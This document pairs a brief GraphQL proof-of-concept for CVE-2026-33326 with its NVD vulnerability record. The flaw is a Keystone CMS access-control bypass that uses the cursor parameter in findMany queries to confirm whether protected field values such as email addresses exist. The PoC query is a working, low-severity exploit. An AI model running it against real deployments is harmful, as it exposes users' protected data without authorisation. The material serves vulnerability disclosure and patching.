CVE-2026-33326

# GraphQL PoC for CVE-2026-33326 # Target: Keystone < 6.5.2 # Description: Bypass isFilterable access control using cursor in findMany query ExploitCursorCheck { # Attacker constructs a query targeting a protected unique field (e.g., email) # Normally filtering by 'email' is restricted by isFilterable: false # However, the 'cursor' parameter accepts UniqueWhere input without this check. findMany( # The cursor is set to the sensitive value we want to check existence of cursor: { email: "[email protected]" } ) { id name # If the record exists, the query will return data (or specific errors) # If it doesn't exist, it returns empty. # This confirms the existence of the email address. } }

{"cve": {"id": "CVE-2026-33326", "sourceIdentifier": "[email protected]", "published": "2026-03-24T20:16:28.043", "lastModified": "2026-05-04T15:26:15.500", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Keystone is a content management system for Node.js. Prior to version 6.5.2, {field}.isFilterable access control can be bypassed in findMany queries by passing a cursor. This can be used to confirm the existence of records by protected field values. The fix for CVE-2025-46720 (field-level isFilterable bypass for update and delete mutations) added checks to the where parameter in update and delete mutations however the cursor parameter in findMany was not patched and accepts the same UniqueWhere input type. This issue has been patched in version 6.5.2."}, {"lang": "es", "value": "Keystone es un sistema de gestión de contenido para Node.js. Antes de la versión 6.5.2, el control de acceso {field}.isFilterable puede ser eludido en consultas findMany al pasar un cursor. Esto puede usarse para confirmar la existencia de registros mediante valores de campos protegidos. La corrección para CVE-2025-46720 (elusión de isFilterable a nivel de campo para mutaciones de actualización y eliminación) añadió comprobaciones al parámetro where en las mutaciones de actualización y eliminación; sin embargo, el parámetro cursor en findMany no fue parcheado y acepta el mismo tipo de entrada UniqueWhere. Este problema ha sido parcheado en la versión 6.5.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:keystonejs:keystone:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "6.5.2", "matchCriteriaId": "7115F298-5F71-4F46-ADD2-ED8159B278A5"}]}]}], "references": [{"url": "https://github.com/keystonejs/keystone/security/advisories/GHSA-cgcg-q9jh-5pr2", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}